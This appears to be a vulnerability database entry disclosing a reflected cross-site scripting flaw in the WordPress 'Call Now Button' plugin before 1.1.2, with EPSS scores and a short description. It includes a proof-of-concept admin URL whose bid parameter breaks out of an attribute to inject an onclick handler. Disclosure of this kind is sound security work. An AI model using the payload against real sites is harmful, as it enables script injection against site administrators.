Lucene search

K
wpexploit7cooWPEX-ID:8267046E-870E-4CCD-B920-340233ED3B93
HistoryApr 25, 2022 - 12:00 a.m.

Call Now Button < 1.1.2 - Reflected Cross-Site Scripting

2022-04-2500:00:00
7coo
78
call now button
reflected cross-site scripting
premium enabled

EPSS

0.001

Percentile

40.2%

The plugin does not escape a parameter before outputting it back in an attribute of a hidden input, leading to a Reflected Cross-Site Scripting when the premium is enabled

With premium enabled: http://example.com/wp-admin/admin.php?page=call-now-button&bid=xxxxx" accesskey=X onclick=alert(/XSS/) test="

EPSS

0.001

Percentile

40.2%

Related for WPEX-ID:8267046E-870E-4CCD-B920-340233ED3B93